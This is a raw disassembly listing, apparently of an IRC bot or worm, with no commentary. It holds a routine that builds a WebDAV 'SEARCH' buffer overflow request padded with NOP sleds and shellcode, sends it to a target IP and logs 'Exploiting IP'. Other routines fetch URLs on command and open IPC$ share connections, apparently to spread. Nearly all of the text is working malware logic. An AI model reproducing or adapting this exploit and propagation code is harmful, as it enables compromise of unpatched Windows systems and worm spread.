cmp eax, ebx
mov dword_43B260[esi], ebx
mov dword_43B264[esi], ebx
jbe short loc_41386E
push eax
call sub_409127
pop ecx
loc_41386E: ; CODE XREF: sub_41381B+4A�j
mov [edi], ebx
lea edi, dword_43B26C[esi]
push dword ptr [edi]
mov byte ptr dword_43B060[esi], bl
mov byte_43B278[esi], bl
call dword_43A4D0 ; closesocket
lea esi, dword_43B270[esi]
push dword ptr [esi]
mov [edi], ebx
call dword_43A4D0 ; closesocket
mov [esi], ebx
pop edi
loc_41389D: ; CODE XREF: sub_41381B+D�j
; sub_41381B+15�j
pop esi
mov eax, ebp
pop ebp
pop ebx
retn
sub_41381B endp
; =============== S U B R O U T I N E =======================================
sub_4138A3 proc near ; CODE XREF: sub_403500+18�p
; sub_409848+4254�p ...
push ebx
push esi
push edi
xor ebx, ebx
xor edi, edi
mov esi, offset dword_43B060
loc_4138AF: ; CODE XREF: sub_4138A3+2A�j
cmp byte ptr [esi], 0
jz short loc_4138C0
push edi
call sub_41381B
test eax, eax
pop ecx
jz short loc_4138C0
inc ebx
loc_4138C0: ; CODE XREF: sub_4138A3+F�j
; sub_4138A3+1A�j
add esi, 234h
inc edi
cmp esi, offset dword_47FDF0
jl short loc_4138AF
pop edi
pop esi
mov eax, ebx
pop ebx
retn
sub_4138A3 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_4138D5 proc near ; CODE XREF: sub_409848+1CD8�p
; sub_409848+1D43�p ...
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
push ebp
mov ebp, esp
push ecx
push ebx
push esi
xor ebx, ebx
push edi
mov edi, [ebp+arg_4]
mov [ebp+var_4], ebx
mov esi, offset dword_43B264
loc_4138E9: ; CODE XREF: sub_4138D5+43�j
mov eax, [esi-4]
cmp eax, [ebp+arg_0]
jnz short loc_41390B
test edi, edi
jle short loc_4138FD
cmp [esi], edi
jz short loc_4138FD
cmp ebx, edi
jnz short loc_41390B
loc_4138FD: ; CODE XREF: sub_4138D5+1E�j
; sub_4138D5+22�j
push ebx
call sub_41381B
test eax, eax
pop ecx
jz short loc_41390B
inc [ebp+var_4]
loc_41390B: ; CODE XREF: sub_4138D5+1A�j
; sub_4138D5+26�j ...
add esi, 234h
inc ebx
cmp esi, offset dword_47FFF4
jl short loc_4138E9
mov eax, [ebp+var_4]
pop edi
pop esi
pop ebx
leave
retn
sub_4138D5 endp
; =============== S U B R O U T I N E =======================================
sub_413922 proc near ; CODE XREF: sub_4010CA+B�p
; sub_401141+2D�p ...
arg_0 = dword ptr 4
xor eax, eax
mov ecx, offset dword_43B260
loc_413929: ; CODE XREF: sub_413922+1C�j
mov edx, [ecx]
cmp edx, [esp+arg_0]
jnz short loc_413932
inc eax
loc_413932: ; CODE XREF: sub_413922+D�j
add ecx, 234h
cmp ecx, offset dword_47FFF0
jl short loc_413929
retn
sub_413922 endp
; =============== S U B R O U T I N E =======================================
sub_413941 proc near ; CODE XREF: sub_409848+4BA0�p
arg_0 = dword ptr 4
xor eax, eax
xor edx, edx
mov ecx, offset dword_43B260
push esi
loc_41394B: ; CODE XREF: sub_413941+1F�j
mov esi, [ecx]
cmp esi, [esp+4+arg_0]
jz short loc_413964
add ecx, 234h
inc edx
cmp ecx, offset dword_47FFF0
jl short loc_41394B
pop esi
retn
; ---------------------------------------------------------------------------
loc_413964: ; CODE XREF: sub_413941+10�j
mov eax, edx
pop esi
retn
sub_413941 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_413968 proc near ; CODE XREF: sub_409848+21D7�p
; sub_409848+52D0�p ...
var_200 = byte ptr -200h
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
arg_C = dword ptr 14h
arg_10 = dword ptr 18h
arg_14 = dword ptr 1Ch
arg_18 = dword ptr 20h
arg_1C = dword ptr 24h
push ebp
mov ebp, esp
sub esp, 200h
xor eax, eax
cmp [ebp+arg_1C], eax
jz short loc_413981
push [ebp+arg_1C]
call sub_416D02
pop ecx
loc_413981: ; CODE XREF: sub_413968+E�j
push eax
push [ebp+arg_18]
call sub_4138D5
test eax, eax
pop ecx
pop ecx
jle short loc_4139AD
push eax
push [ebp+arg_14]
lea eax, [ebp+var_200]
push [ebp+arg_10]
push offset aSSStopped_DThr ; "%s: %s stopped. (%d thread(s) stopped.)"...
push eax
call sub_416975
add esp, 14h
jmp short loc_4139C7
; ---------------------------------------------------------------------------
loc_4139AD: ; CODE XREF: sub_413968+26�j
push [ebp+arg_14]
lea eax, [ebp+var_200]
push [ebp+arg_10]
push offset aSNoSThreadFoun ; "%s: No %s thread found."
push eax
call sub_416975
add esp, 10h
loc_4139C7: ; CODE XREF: sub_413968+43�j
cmp [ebp+arg_C], 0
jnz short loc_4139E7
push 0
push [ebp+arg_8]
lea eax, [ebp+var_200]
push eax
push [ebp+arg_4]
push [ebp+arg_0]
call sub_405D62
add esp, 14h
loc_4139E7: ; CODE XREF: sub_413968+63�j
lea eax, [ebp+var_200]
push eax
call sub_401F0F
pop ecx
leave
retn
sub_413968 endp
; =============== S U B R O U T I N E =======================================
sub_4139F6 proc near ; CODE XREF: sub_40195E+227�p
; sub_401B94+25D�p ...
arg_0 = dword ptr 4
mov eax, [esp+arg_0]
imul eax, 234h
xor ecx, ecx
mov dword_43B274[eax], ecx
mov dword_43B260[eax], ecx
mov dword_43B264[eax], ecx
mov dword_43B268[eax], ecx
mov dword_43B26C[eax], ecx
mov dword_43B270[eax], ecx
mov byte ptr dword_43B060[eax], cl
mov byte_43B278[eax], cl
retn
sub_4139F6 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame fpd=74h
sub_413A33 proc near ; DATA XREF: sub_409848+5133�o
var_98 = dword ptr -98h
var_94 = byte ptr -94h
var_14 = dword ptr -14h
var_10 = dword ptr -10h
var_C = dword ptr -0Ch
arg_0 = dword ptr 8
push ebp
lea ebp, [esp-74h]
sub esp, 98h
mov eax, [ebp+74h+arg_0]
push esi
push edi
push 26h
pop ecx
mov esi, eax
lea edi, [ebp+74h+var_98]
rep movsd
push [ebp+74h+var_10]
mov dword ptr [eax+94h], 1
push [ebp+74h+var_C]
lea eax, [ebp+74h+var_94]
push eax
push [ebp+74h+var_98]
call sub_41379D
push [ebp+74h+var_14]
call sub_4139F6
add esp, 14h
push 0
call dword_422014 ; ExitThread
int 3 ; Trap to Debugger
sub_413A33 endp ; sp-analysis failed
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame fpd=74h
sub_413A7D proc near ; DATA XREF: sub_409848+3ED0�o
var_65C = byte ptr -65Ch
var_55C = byte ptr -55Ch
var_35C = dword ptr -35Ch
var_358 = byte ptr -358h
var_2D8 = byte ptr -2D8h
var_258 = byte ptr -258h
var_1D8 = dword ptr -1D8h
var_1D4 = dword ptr -1D4h
var_1D0 = dword ptr -1D0h
var_1C8 = byte ptr -1C8h
var_148 = byte ptr -148h
var_C8 = byte ptr -0C8h
var_48 = dword ptr -48h
var_38 = dword ptr -38h
var_34 = dword ptr -34h
var_30 = word ptr -30h
var_2C = dword ptr -2Ch
var_28 = dword ptr -28h
var_24 = dword ptr -24h
var_20 = dword ptr -20h
var_1C = dword ptr -1Ch
var_18 = dword ptr -18h
var_C = dword ptr -0Ch
var_8 = dword ptr -8
var_4 = dword ptr -4
arg_0 = dword ptr 8
push ebp
lea ebp, [esp-74h]
sub esp, 65Ch
mov eax, [ebp+74h+arg_0]
push ebx
push esi
push edi
push 65h
pop ecx
push 20h
mov esi, eax
xor edx, edx
inc edx
lea edi, [ebp+74h+var_35C]
rep movsd
pop ecx
push 20h
xor ebx, ebx
mov [eax+190h], edx
xor eax, eax
lea edi, [ebp+74h+var_148]
rep stosd
pop ecx
push 20h
lea edi, [ebp+74h+var_1C8]
rep stosd
pop ecx
push 40h
lea edi, [ebp+74h+var_C8]
rep stosd
pop ecx
lea edi, [ebp+74h+var_65C]
rep stosd
push 0Fh
pop ecx
lea edi, [ebp+74h+var_48]
rep stosd
lea eax, [ebp+74h+var_358]
mov [ebp+74h+var_8], ebx
mov [ebp+74h+var_4], ebx
mov [ebp+74h+var_C], offset asc_42BA20 ; "*/*"
mov [ebp+74h+var_48], 3Ch
mov [ebp+74h+var_34], edx
mov [ebp+74h+var_28], edx
mov [ebp+74h+var_20], edx
mov [ebp+74h+var_18], edx
lea esi, [eax+1]
loc_413B02: ; CODE XREF: sub_413A7D+8A�j
mov cl, [eax]
inc eax
cmp cl, bl
jnz short loc_413B02
lea ecx, [ebp+74h+var_48]
push ecx
sub eax, esi
push ebx
push eax
lea eax, [ebp+74h+var_358]
push eax
call dword_43A330 ; InternetCrackUrlA
test eax, eax
jnz short loc_413B3B
lea eax, [ebp+74h+var_55C]
push offset aVisitInvalidUr ; "[VISIT]: Invalid URL."
push eax
call sub_416975
mov esi, [ebp+74h+var_8]
jmp loc_413C2A
; ---------------------------------------------------------------------------
loc_413B3B: ; CODE XREF: sub_413A7D+A3�j
cmp [ebp+74h+var_34], ebx
jbe short loc_413B55
push [ebp+74h+var_34]
lea eax, [ebp+74h+var_148]
push [ebp+74h+var_38]
push eax
call sub_416A00
add esp, 0Ch
loc_413B55: ; CODE XREF: sub_413A7D+C1�j
cmp [ebp+74h+var_28], ebx
movzx esi, [ebp+74h+var_30]
jbe short loc_413B73
push [ebp+74h+var_28]
lea eax, [ebp+74h+var_1C8]
push [ebp+74h+var_2C]
push eax
call sub_416A00
add esp, 0Ch
loc_413B73: ; CODE XREF: sub_413A7D+DF�j
cmp [ebp+74h+var_20], ebx
jbe short loc_413B8A
push [ebp+74h+var_20]
lea eax, [ebp+74h+var_C8]
push [ebp+74h+var_24]
push eax
call sub_416A00
add esp, 0Ch
loc_413B8A: ; CODE XREF: sub_413A7D+F9�j
cmp [ebp+74h+var_18], ebx
jbe short loc_413BA4
push [ebp+74h+var_18]
lea eax, [ebp+74h+var_65C]
push [ebp+74h+var_1C]
push eax
call sub_416A00
add esp, 0Ch
loc_413BA4: ; CODE XREF: sub_413A7D+110�j
push ebx
push ebx
push 3
lea eax, [ebp+74h+var_C8]
push eax
lea eax, [ebp+74h+var_1C8]
push eax
push esi
lea eax, [ebp+74h+var_148]
push eax
push dword_43A508
call dword_43A3F4 ; InternetConnectA
mov esi, eax
cmp esi, ebx
jnz short loc_413BD4
push offset aVisitCouldNotO ; "[VISIT]: Could not open a connection."
jmp short loc_413C1E
; ---------------------------------------------------------------------------
loc_413BD4: ; CODE XREF: sub_413A7D+14E�j
push ebx
push 200h
lea eax, [ebp+74h+var_C]
push eax
lea eax, [ebp+74h+var_2D8]
push eax
push ebx
lea eax, [ebp+74h+var_65C]
push eax
push ebx
push esi
call dword_43A3E4 ; HttpOpenRequestA
cmp eax, ebx
mov [ebp+74h+var_4], eax
jnz short loc_413C03
push offset aVisitFailedToC ; "[VISIT]: Failed to connect to HTTP serv"...
jmp short loc_413C1E
; ---------------------------------------------------------------------------
loc_413C03: ; CODE XREF: sub_413A7D+17D�j
push ebx
push ebx
push ebx
push ebx
push eax
call dword_43A50C ; HttpSendRequestA
test eax, eax
jz short loc_413C19
push offset aVisitUrlVisite ; "[VISIT]: URL visited."
jmp short loc_413C1E
; ---------------------------------------------------------------------------
loc_413C19: ; CODE XREF: sub_413A7D+193�j
push offset aVisitFailedToG ; "[VISIT]: Failed to get requested URL fr"...
loc_413C1E: ; CODE XREF: sub_413A7D+155�j
; sub_413A7D+184�j ...
lea eax, [ebp+74h+var_55C]
push eax
call sub_416975
loc_413C2A: ; CODE XREF: sub_413A7D+B9�j
cmp [ebp+74h+var_1D4], ebx
pop ecx
pop ecx
jnz short loc_413C57
push ebx
push [ebp+74h+var_1D0]
lea eax, [ebp+74h+var_55C]
push eax
lea eax, [ebp+74h+var_258]
push eax
push [ebp+74h+var_35C]
call sub_405D62
add esp, 14h
loc_413C57: ; CODE XREF: sub_413A7D+1B5�j
lea eax, [ebp+74h+var_55C]
push eax
call sub_401F0F
pop ecx
push esi
call dword_43A41C ; InternetCloseHandle
push [ebp+74h+var_4]
call dword_43A41C ; InternetCloseHandle
push [ebp+74h+var_1D8]
call sub_4139F6
pop ecx
push ebx
call dword_422014 ; ExitThread
int 3 ; Trap to Debugger
sub_413A7D endp ; sp-analysis failed
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_413C88 proc near ; CODE XREF: sub_40195E+1F8�p
; DATA XREF: .text:off_42E06C�o
var_1210 = byte ptr -1210h
var_11AC = byte ptr -11ACh
var_210 = byte ptr -210h
var_10 = dword ptr -10h
var_C = dword ptr -0Ch
var_8 = dword ptr -8
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = byte ptr 0Ch
arg_28 = byte ptr 30h
arg_B4 = dword ptr 0BCh
arg_BC = dword ptr 0C4h
arg_C4 = dword ptr 0CCh
arg_C8 = dword ptr 0D0h
push ebp
mov ebp, esp
mov eax, 1210h
call sub_416B90
push 6
push 1
push 2
call dword_43A3BC ; socket
cmp eax, 0FFFFFFFFh
mov [ebp+var_10], eax
jnz short loc_413CAD
xor eax, eax
leave
retn
; ---------------------------------------------------------------------------
loc_413CAD: ; CODE XREF: sub_413C88+1F�j
push ebx
push esi
push edi
push [ebp+arg_B4]
call dword_43A514 ; ntohs
lea eax, [ebp+arg_4]
push eax
call dword_43A434 ; inet_addr
push 186A0h
call sub_416E1F
mov edi, 1000h
push edi
mov ebx, eax
call sub_416E1F
pop ecx
pop ecx
push offset byte_42FD4C
push [ebp+arg_0]
mov esi, eax
mov [ebp+var_C], esi
call sub_408894
pop ecx
push eax
push edi
push esi
call sub_4120F4
add esp, 10h
test eax, eax
mov [ebp+var_8], eax
jnz short loc_413D22
push ebx
call sub_416D07
push esi
call sub_416D07
pop ecx
pop ecx
push [ebp+var_10]
loc_413D15: ; CODE XREF: sub_413C88+27B�j
call dword_43A4D0 ; closesocket
xor eax, eax
jmp loc_413F9F
; ---------------------------------------------------------------------------
loc_413D22: ; CODE XREF: sub_413C88+7A�j
push 19h
mov eax, 90909090h
pop ecx
lea edi, [ebp+var_1210]
rep stosd
mov ecx, [ebp+var_8]
mov eax, ecx
shr ecx, 2
lea edi, [ebp+var_11AC]
rep movsd
mov ecx, eax
and ecx, 3
rep movsb
xor eax, eax
mov ecx, 61A8h
mov edi, ebx
rep stosd
mov esi, offset aSearch ; "SEARCH /"
mov edi, ebx
movsd
movsd
mov eax, ebx
movsb
lea esi, [eax+1]
loc_413D63: ; CODE XREF: sub_413C88+E0�j
mov cl, [eax]
inc eax
test cl, cl
jnz short loc_413D63
sub eax, esi
mov esi, eax
lea edx, [esi+1]
lea eax, [esi+866h]
cmp edx, eax
mov byte ptr [esi+ebx], 90h
jnb short loc_413DA1
sub eax, edx
dec eax
shr eax, 1
inc eax
mov ecx, eax
mov [ebp+var_4], ecx
shr ecx, 1
lea edi, [edx+ebx]
mov eax, 0B102B102h
rep stosd
adc ecx, ecx
rep stosw
mov eax, [ebp+var_4]
lea edx, [edx+eax*2]
loc_413DA1: ; CODE XREF: sub_413C88+F5�j
mov eax, offset loc_430348
mov edi, eax
lea ecx, [edi+1]
mov [ebp+var_4], ecx
loc_413DAE: ; CODE XREF: sub_413C88+12B�j
mov cl, [edi]
inc edi
test cl, cl
jnz short loc_413DAE
sub edi, [ebp+var_4]
jmp short loc_413DCF
; ---------------------------------------------------------------------------
loc_413DBA: ; CODE XREF: sub_413C88+155�j
lea ecx, [edi+1]
mov byte ptr [edx+ebx], 90h
inc edx
mov [ebp+var_4], ecx
loc_413DC5: ; CODE XREF: sub_413C88+142�j
mov cl, [edi]
inc edi
test cl, cl
jnz short loc_413DC5
sub edi, [ebp+var_4]
loc_413DCF: ; CODE XREF: sub_413C88+130�j
mov ecx, esi
sub ecx, edi
add ecx, 0FFFFh
cmp edx, ecx
mov edi, eax
jb short loc_413DBA
lea esi, [edi+1]
loc_413DE2: ; CODE XREF: sub_413C88+15F�j
mov cl, [edi]
inc edi
test cl, cl
jnz short loc_413DE2
sub edi, esi
mov ecx, edi
mov esi, eax
mov eax, ecx
shr ecx, 2
lea edi, [edx+ebx]
rep movsd
mov ecx, eax
and ecx, 3
rep movsb
mov edi, ebx
dec edi
loc_413E03: ; CODE XREF: sub_413C88+181�j
mov al, [edi+1]
inc edi
test al, al
jnz short loc_413E03
mov esi, offset aHttp1_1 ; " HTTP/1.1\r\n"
movsd
movsd
movsd
mov esi, offset a?xmlVersion1_0 ; "<?xml version=\"1.0\"?>\r\n<g:searchrequest"...
mov eax, esi
lea edi, [eax+1]
loc_413E1D: ; CODE XREF: sub_413C88+19A�j
mov cl, [eax]
inc eax
test cl, cl
jnz short loc_413E1D
sub eax, edi
mov edi, eax
mov eax, ebx
lea ecx, [eax+1]
loc_413E2D: ; CODE XREF: sub_413C88+1AA�j
mov dl, [eax]
inc eax
test dl, dl
jnz short loc_413E2D
sub eax, ecx
mov ecx, [ebp+var_8]
add edi, ecx
push edi
lea ecx, [ebp+arg_4]
push ecx
add eax, ebx
push offset aHostSContentTy ; "Host: %s\r\nContent-Type: text/xml\r\nConte"...
push eax
call sub_416975
add esp, 10h
mov eax, esi
loc_413E52: ; CODE XREF: sub_413C88+1CF�j
mov cl, [eax]
inc eax
test cl, cl
jnz short loc_413E52
mov edi, ebx
sub eax, esi
dec edi
loc_413E5E: ; CODE XREF: sub_413C88+1DC�j
mov cl, [edi+1]
inc edi
test cl, cl
jnz short loc_413E5E
mov ecx, eax
shr ecx, 2
rep movsd
mov ecx, eax
and ecx, 3
mov eax, ebx
rep movsb
lea esi, [eax+1]
loc_413E79: ; CODE XREF: sub_413C88+1F6�j
mov cl, [eax]
inc eax
test cl, cl
jnz short loc_413E79
sub eax, esi
mov ecx, eax
mov eax, 1010101h
lea edi, [ecx+ebx]
stosb
mov eax, ebx
lea esi, [eax+1]
loc_413E92: ; CODE XREF: sub_413C88+20F�j
mov cl, [eax]
inc eax
test cl, cl
jnz short loc_413E92
sub eax, esi
mov ecx, eax
mov eax, 90909090h
lea edi, [ecx+ebx]
stosw
stosb
mov eax, ebx
lea esi, [eax+1]
loc_413EAD: ; CODE XREF: sub_413C88+22A�j
mov cl, [eax]
inc eax
test cl, cl
jnz short loc_413EAD
mov ecx, [ebp+var_8]
sub eax, esi
lea edi, [eax+ebx]
mov eax, ecx
shr ecx, 2
lea esi, [ebp+var_1210]
rep movsd
mov ecx, eax
and ecx, 3
mov eax, ebx
rep movsb
lea esi, [eax+1]
loc_413ED5: ; CODE XREF: sub_413C88+252�j
mov cl, [eax]
inc eax
test cl, cl
jnz short loc_413ED5
sub eax, esi
mov esi, [ebp+var_10]
xor edi, edi
push edi
push eax
push ebx
push esi
call dword_43A458 ; send
cmp eax, 0FFFFFFFFh
jnz short loc_413F08
push ebx
call sub_416D07
push [ebp+var_C]
call sub_416D07
pop ecx
pop ecx
push esi
jmp loc_413D15
; ---------------------------------------------------------------------------
loc_413F08: ; CODE XREF: sub_413C88+268�j
push edi
push 1388h
push ebx
push esi
call dword_43A324 ; recv
push ebx
call sub_416D07
push [ebp+var_C]
call sub_416D07
pop ecx
pop ecx
push esi
call dword_43A4D0 ; closesocket
lea eax, [ebp+arg_4]
push eax
mov eax, [ebp+arg_BC]
imul eax, 3Ch
add eax, offset aWebdav_0 ; "WebDav"
push eax
push offset aSExploitingIpS ; "[%s]: Exploiting IP: %s."
lea eax, [ebp+var_210]
push 200h
push eax
call sub_416BCD
add esp, 14h
cmp [ebp+arg_C8], edi
jnz short loc_413F7E
push edi
push [ebp+arg_C4]
lea eax, [ebp+var_210]
push eax
lea eax, [ebp+arg_28]
push eax
push [ebp+arg_0]
call sub_405D62
add esp, 14h
loc_413F7E: ; CODE XREF: sub_413C88+2D7�j
lea eax, [ebp+var_210]
push eax
call sub_401F0F
mov eax, [ebp+arg_BC]
imul eax, 3Ch
lea eax, dword_42E070[eax]
inc dword ptr [eax]
xor eax, eax
pop ecx
inc eax
loc_413F9F: ; CODE XREF: sub_413C88+95�j
pop edi
pop esi
pop ebx
leave
retn
sub_413C88 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_413FA4 proc near ; CODE XREF: sub_414038+41�p
var_8 = dword ptr -8
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
push ebp
mov ebp, esp
push ecx
push ecx
mov edx, [ebp+arg_0]
mov ecx, [edx]
push edi
xor edi, edi
and [ebp+var_8], edi
xor eax, eax
inc eax
cmp byte ptr [ecx], 21h
mov [ebp+var_4], eax
jnz short loc_413FC5
inc ecx
mov [ebp+var_8], eax
mov [edx], ecx
loc_413FC5: ; CODE XREF: sub_413FA4+19�j
push ebx
push esi
loc_413FC7: ; CODE XREF: sub_413FA4+77�j
mov ecx, [edx]
mov bl, [ecx]
cmp bl, 5Dh
jnz short loc_413FD5
cmp [ebp+var_4], eax
jnz short loc_41401D
loc_413FD5: ; CODE XREF: sub_413FA4+2A�j
test edi, edi
jnz short loc_414012
cmp bl, 2Dh
jnz short loc_414006
lea esi, [ecx+1]
mov cl, [ecx-1]
mov al, [esi]
cmp cl, al
jge short loc_414006
cmp al, 5Dh
jz short loc_414006
cmp [ebp+var_4], edi
jnz short loc_414006
mov ebx, [ebp+arg_4]
mov ebx, [ebx]
mov bl, [ebx]
cmp bl, cl
jl short loc_414012
cmp bl, al
jg short loc_414012
mov [edx], esi
jmp short loc_41400F
; ---------------------------------------------------------------------------
loc_414006: ; CODE XREF: sub_413FA4+38�j
; sub_413FA4+44�j ...
mov eax, [ebp+arg_4]
mov eax, [eax]
cmp bl, [eax]
jnz short loc_414012
loc_41400F: ; CODE XREF: sub_413FA4+60�j
xor edi, edi
inc edi
loc_414012: ; CODE XREF: sub_413FA4+33�j
; sub_413FA4+58�j ...
inc dword ptr [edx]
and [ebp+var_4], 0
xor eax, eax
inc eax
jmp short loc_413FC7
; ---------------------------------------------------------------------------
loc_41401D: ; CODE XREF: sub_413FA4+2F�j
cmp [ebp+var_8], eax
pop esi
pop ebx
jnz short loc_41402A
mov ecx, eax
sub ecx, edi
mov edi, ecx
loc_41402A: ; CODE XREF: sub_413FA4+7E�j
cmp edi, eax
jnz short loc_414033
mov eax, [ebp+arg_4]
inc dword ptr [eax]
loc_414033: ; CODE XREF: sub_413FA4+88�j
mov eax, edi
pop edi
leave
retn
sub_413FA4 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_414038 proc near ; CODE XREF: sub_409848+61D1�p
; sub_4140CC+65�p ...
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
push ebp
mov ebp, esp
xor eax, eax
push esi
mov esi, [ebp+arg_0]
inc eax
jmp short loc_41409A
; ---------------------------------------------------------------------------
loc_414044: ; CODE XREF: sub_414038+66�j
cmp eax, 1
jnz short loc_4140AB
mov edx, [ebp+arg_4]
mov dl, [edx]
test dl, dl
jz short loc_4140AB
cmp cl, 2Ah
jz short loc_414083
cmp cl, 3Fh
jz short loc_414068
cmp cl, 5Bh
jz short loc_41406D
xor eax, eax
cmp cl, dl
setz al
loc_414068: ; CODE XREF: sub_414038+22�j
inc [ebp+arg_4]
jmp short loc_414096
; ---------------------------------------------------------------------------
loc_41406D: ; CODE XREF: sub_414038+27�j
lea eax, [ebp+arg_4]
push eax
lea eax, [ebp+arg_0]
inc esi
push eax
mov [ebp+arg_0], esi
call sub_413FA4
mov esi, [ebp+arg_0]
jmp short loc_414094
; ---------------------------------------------------------------------------
loc_414083: ; CODE XREF: sub_414038+1D�j
lea eax, [ebp+arg_4]
push eax
lea eax, [ebp+arg_0]
push eax
call sub_4140CC
mov esi, [ebp+arg_0]
dec esi
loc_414094: ; CODE XREF: sub_414038+49�j
pop ecx
pop ecx
loc_414096: ; CODE XREF: sub_414038+33�j
inc esi
mov [ebp+arg_0], esi
loc_41409A: ; CODE XREF: sub_414038+A�j
mov cl, [esi]
test cl, cl
jnz short loc_414044
jmp short loc_4140AB
; ---------------------------------------------------------------------------
loc_4140A2: ; CODE XREF: sub_414038+76�j
cmp eax, 1
jnz short loc_4140C7
inc esi
mov [ebp+arg_0], esi
loc_4140AB: ; CODE XREF: sub_414038+F�j
; sub_414038+18�j ...
cmp byte ptr [esi], 2Ah
jz short loc_4140A2
cmp eax, 1
jnz short loc_4140C7
mov eax, [ebp+arg_4]
cmp byte ptr [eax], 0
jnz short loc_4140C7
cmp byte ptr [esi], 0
jnz short loc_4140C7
xor eax, eax
inc eax
jmp short loc_4140C9
; ---------------------------------------------------------------------------
loc_4140C7: ; CODE XREF: sub_414038+6D�j
; sub_414038+7B�j ...
xor eax, eax
loc_4140C9: ; CODE XREF: sub_414038+8D�j
pop esi
pop ebp
retn
sub_414038 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_4140CC proc near ; CODE XREF: sub_414038+53�p
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
push ebp
mov ebp, esp
push ecx
push ebx
push esi
mov esi, [ebp+arg_0]
inc dword ptr [esi]
push edi
mov edi, [ebp+arg_4]
mov [ebp+var_4], 1
xor ebx, ebx
jmp short loc_4140FB
; ---------------------------------------------------------------------------
loc_4140E6: ; CODE XREF: sub_4140CC+35�j
mov cl, [eax]
cmp cl, 3Fh
jz short loc_4140F7
cmp cl, 2Ah
jnz short loc_414103
cmp cl, 3Fh
jnz short loc_4140F9
loc_4140F7: ; CODE XREF: sub_4140CC+1F�j
inc dword ptr [edi]
loc_4140F9: ; CODE XREF: sub_4140CC+29�j
inc dword ptr [esi]
loc_4140FB: ; CODE XREF: sub_4140CC+18�j
mov ecx, [edi]
cmp [ecx], bl
mov eax, [esi]
jnz short loc_4140E6
loc_414103: ; CODE XREF: sub_4140CC+24�j
cmp byte ptr [eax], 2Ah
jnz short loc_414112
loc_414108: ; CODE XREF: sub_4140CC+44�j
inc eax
mov ecx, eax
mov [esi], eax
cmp byte ptr [ecx], 2Ah
jz short loc_414108
loc_414112: ; CODE XREF: sub_4140CC+3A�j
mov ecx, [edi]
mov dl, [ecx]
cmp dl, bl
jnz short loc_41412F
cmp [eax], bl
jz short loc_414122
xor eax, eax
jmp short loc_414194
; ---------------------------------------------------------------------------
loc_414122: ; CODE XREF: sub_4140CC+50�j
cmp dl, bl
jnz short loc_41412F
cmp [eax], bl
jnz short loc_41412F
xor eax, eax
inc eax
jmp short loc_414194
; ---------------------------------------------------------------------------
loc_41412F: ; CODE XREF: sub_4140CC+4C�j
; sub_4140CC+58�j ...
push ecx
push eax
call sub_414038
test eax, eax
pop ecx
pop ecx
jnz short loc_41417E
loc_41413C: ; CODE XREF: sub_4140CC+B0�j
inc dword ptr [edi]
mov ecx, [esi]
mov eax, [edi]
mov cl, [ecx]
cmp cl, [eax]
jz short loc_414160
loc_414148: ; CODE XREF: sub_4140CC+92�j
mov ecx, [esi]
cmp byte ptr [ecx], 5Bh
jz short loc_414160
cmp [eax], bl
jz short loc_414175
inc eax
mov [edi], eax
mov ecx, [esi]
mov cl, [ecx]
mov edx, eax
cmp cl, [edx]
jnz short loc_414148
loc_414160: ; CODE XREF: sub_4140CC+7A�j
; sub_4140CC+81�j
cmp [eax], bl
jz short loc_414175
push eax
push dword ptr [esi]
call sub_414038
neg eax
pop ecx
sbb eax, eax
pop ecx
inc eax
jmp short loc_41417A
; ---------------------------------------------------------------------------
loc_414175: ; CODE XREF: sub_4140CC+85�j
; sub_4140CC+96�j
mov [ebp+var_4], ebx
xor eax, eax
loc_41417A: ; CODE XREF: sub_4140CC+A7�j
cmp eax, ebx
jnz short loc_41413C
loc_41417E: ; CODE XREF: sub_4140CC+6E�j
mov eax, [edi]
cmp [eax], bl
jnz short loc_414191
mov eax, [esi]
cmp [eax], bl
jnz short loc_414191
mov [ebp+var_4], 1
loc_414191: ; CODE XREF: sub_4140CC+B6�j
; sub_4140CC+BC�j
mov eax, [ebp+var_4]
loc_414194: ; CODE XREF: sub_4140CC+54�j
; sub_4140CC+61�j
pop edi
pop esi
pop ebx
leave
retn
sub_4140CC endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_414199 proc near ; CODE XREF: .text:004145C4�p
var_354 = byte ptr -354h
var_34E = byte ptr -34Eh
var_124 = byte ptr -124h
var_123 = byte ptr -123h
var_C = byte ptr -0Ch
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
push ebp
mov ebp, esp
sub esp, 354h
push ebx
push esi
push edi
mov esi, offset aIpc ; "\\IPC$"
lea edi, [ebp+var_C]
movsd
movsd
movsd
mov esi, offset asc_42BA98 ; "\\\\"
lea edi, [ebp+var_354]
movsd
movsw
xor eax, eax
mov ecx, 8Ah
lea edi, [ebp+var_34E]
rep stosd
push 45h
stosw
pop ecx
xor ebx, ebx
xor eax, eax
mov [ebp+var_124], bl
lea edi, [ebp+var_123]
rep stosd
stosw
push 0FFh
stosb
lea eax, [ebp+var_124]
push eax
push 0FFFFFFFFh
push [ebp+arg_0]
push ebx
push ebx
call dword_4220D4 ; MultiByteToWideChar
lea eax, [ebp+var_124]
push eax
lea eax, [ebp+var_354]
push eax
call sub_418630
lea eax, [ebp+var_C]
push eax
lea eax, [ebp+var_354]
push eax
call sub_418630
mov esi, [ebp+arg_4]
add esp, 10h
lea eax, [ebp+var_354]
push ebx
mov [esi+14h], eax
mov eax, offset dword_42BA94
push eax
push eax
push esi
mov [esi+4], ebx
mov [esi+10h], ebx
mov [esi+1Ch], ebx
call dword_43A4F8
cmp eax, 5
mov edi, 4C3h
jz short loc_414258
cmp eax, edi
jnz short loc_414262
loc_414258: ; CODE XREF: sub_414199+B9�j
push ebx
push ebx
push ebx
push esi
call dword_43A4F8
